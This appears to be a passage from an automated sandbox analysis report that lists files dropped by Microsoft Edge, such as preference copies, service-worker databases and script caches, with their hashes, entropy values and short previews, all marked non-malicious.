                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d2daa9a8-b6dd-45d8-9b72-3af2f2236b3d.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d43cb5b9-e838-4946-b03d-e1ce899b8c03.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                      MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                      SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                      SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                      SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9680
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.112583781537505
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnkdp8BsIYyaNP9kXOIo8VmbV+Fp4QAXCPSYJ:stnQ8BsIYtJdbG6Q/
                                                                                                                                                                                                                                                                                      MD5:AF13559DB3792877F272DFB0170D6985
                                                                                                                                                                                                                                                                                      SHA1:19AF7DE8B4B0AE12C9951B7DB5E767C4F0664EE6
                                                                                                                                                                                                                                                                                      SHA-256:5B9CE1293A69C58C6F0555E4339916B37E3934AB3C38ED4B112F7303121F24ED
                                                                                                                                                                                                                                                                                      SHA-512:F690D82A8A326D0E2398679AFEEBDD9BA6E9B55A1A4E2D770015B9B417CE4D76E92D064A6DA0B31ED9C042C5911F07D3E304605FAE3AD19144B6A98A87AD7748
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF350b1.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9680
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.112583781537505
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnkdp8BsIYyaNP9kXOIo8VmbV+Fp4QAXCPSYJ:stnQ8BsIYtJdbG6Q/
                                                                                                                                                                                                                                                                                      MD5:AF13559DB3792877F272DFB0170D6985
                                                                                                                                                                                                                                                                                      SHA1:19AF7DE8B4B0AE12C9951B7DB5E767C4F0664EE6
                                                                                                                                                                                                                                                                                      SHA-256:5B9CE1293A69C58C6F0555E4339916B37E3934AB3C38ED4B112F7303121F24ED
                                                                                                                                                                                                                                                                                      SHA-512:F690D82A8A326D0E2398679AFEEBDD9BA6E9B55A1A4E2D770015B9B417CE4D76E92D064A6DA0B31ED9C042C5911F07D3E304605FAE3AD19144B6A98A87AD7748
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF37996.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9680
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.112583781537505
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnkdp8BsIYyaNP9kXOIo8VmbV+Fp4QAXCPSYJ:stnQ8BsIYtJdbG6Q/
                                                                                                                                                                                                                                                                                      MD5:AF13559DB3792877F272DFB0170D6985
                                                                                                                                                                                                                                                                                      SHA1:19AF7DE8B4B0AE12C9951B7DB5E767C4F0664EE6
                                                                                                                                                                                                                                                                                      SHA-256:5B9CE1293A69C58C6F0555E4339916B37E3934AB3C38ED4B112F7303121F24ED
                                                                                                                                                                                                                                                                                      SHA-512:F690D82A8A326D0E2398679AFEEBDD9BA6E9B55A1A4E2D770015B9B417CE4D76E92D064A6DA0B31ED9C042C5911F07D3E304605FAE3AD19144B6A98A87AD7748
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ac4e.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9680
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.112583781537505
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnkdp8BsIYyaNP9kXOIo8VmbV+Fp4QAXCPSYJ:stnQ8BsIYtJdbG6Q/
                                                                                                                                                                                                                                                                                      MD5:AF13559DB3792877F272DFB0170D6985
                                                                                                                                                                                                                                                                                      SHA1:19AF7DE8B4B0AE12C9951B7DB5E767C4F0664EE6
                                                                                                                                                                                                                                                                                      SHA-256:5B9CE1293A69C58C6F0555E4339916B37E3934AB3C38ED4B112F7303121F24ED
                                                                                                                                                                                                                                                                                      SHA-512:F690D82A8A326D0E2398679AFEEBDD9BA6E9B55A1A4E2D770015B9B417CE4D76E92D064A6DA0B31ED9C042C5911F07D3E304605FAE3AD19144B6A98A87AD7748
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.566941256586088
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:XQRbVbWP4afHe8F1+UoAYDCx9Tuqh0VfUC9xbog/OVyvhkSrwHpKtuCX:XQRbVbWP4afHeu1jafJkX8td
                                                                                                                                                                                                                                                                                      MD5:946A5A87E6740BEE007FD0C171107444
                                                                                                                                                                                                                                                                                      SHA1:66765AD1C24D8A94C3A8E5E60AEBF8134B387370
                                                                                                                                                                                                                                                                                      SHA-256:22380EF05AA67C241F3770C2A5B322AFD4CFCBF467E690FA7F660F57BC63FC20
                                                                                                                                                                                                                                                                                      SHA-512:F50D7474842F500ED4135B8A0B433A30AE05D7E4D8AED19ADCB4F16088E76428DD8E81B77AA865E393386C21E3902B73B4DCCDBE8A509C4C8ED79838BC0058F4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379760322200595","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379760322200595","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3495e.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.566941256586088
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:XQRbVbWP4afHe8F1+UoAYDCx9Tuqh0VfUC9xbog/OVyvhkSrwHpKtuCX:XQRbVbWP4afHeu1jafJkX8td
                                                                                                                                                                                                                                                                                      MD5:946A5A87E6740BEE007FD0C171107444
                                                                                                                                                                                                                                                                                      SHA1:66765AD1C24D8A94C3A8E5E60AEBF8134B387370
                                                                                                                                                                                                                                                                                      SHA-256:22380EF05AA67C241F3770C2A5B322AFD4CFCBF467E690FA7F660F57BC63FC20
                                                                                                                                                                                                                                                                                      SHA-512:F50D7474842F500ED4135B8A0B433A30AE05D7E4D8AED19ADCB4F16088E76428DD8E81B77AA865E393386C21E3902B73B4DCCDBE8A509C4C8ED79838BC0058F4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379760322200595","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379760322200595","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                      MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                      SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                      SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                      SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):305
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.153237425820858
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyLDRFm3M1cNwi23oH+TcwtE/a252KLl1yLBlyq2PcNwi23oH+TcwtE/a2ZIFUv:IRFu2ZYeb8xL+yvLZYeb8J2FUv
                                                                                                                                                                                                                                                                                      MD5:9D32B5DB5DACC1FE9AD35A8485CE0C91
                                                                                                                                                                                                                                                                                      SHA1:FC754CCE030C5D978E44661651CF7A2659A5C621
                                                                                                                                                                                                                                                                                      SHA-256:7FA51E8987CCBFE46908176E00B601522118D2DC20CDADF2E3CB290C296E6B38
                                                                                                                                                                                                                                                                                      SHA-512:670509FE3F96EBBA2D86D8955A73A955BD841C44CC82EE6D715F17640CC91532770499A7FA04D5468B13003B00C7B35E3ACA8A812E4E75950C0B210A8CA0CE05
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:40.517 13c4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-03:05:40.542 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):114579
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.578784698937177
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekkvvV:J9LyxPXfOxr1lMe1nL/5L/TXE6n7d2
                                                                                                                                                                                                                                                                                      MD5:509C2B48C2A1AFBEE9EDFBB99A6BC479
                                                                                                                                                                                                                                                                                      SHA1:C3AA06CF89C760208A0CD3E836A07767E49BBDA3
                                                                                                                                                                                                                                                                                      SHA-256:53C63177B85F6AAC60FC19A4FC528B4493D445456382560F456C77B5A363E4B1
                                                                                                                                                                                                                                                                                      SHA-512:7A5813DEE7C1A782000B5D7830533865BCC4E1F15BB8D791E446829E5E78D5D352378A555B9DA4F7458D7472B1200B2EE24666346B62BEE6D7C64E291ABD524D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):189113
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.388647853663027
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:RkljvDBmSs4wwqrff043L/EOTYuQ9vmd65yk1JfDvyURCLk:G24wwcfzL/zcu9dn1Nk
                                                                                                                                                                                                                                                                                      MD5:42B758BA16733BD0973C48141CBF733B
                                                                                                                                                                                                                                                                                      SHA1:692107FF0E735C9AF286FFAF54BACC2361277ADC
                                                                                                                                                                                                                                                                                      SHA-256:A81ED8D6898D56355360F1D7A60D0CD84571A064C59A2001BB14803864E127AE
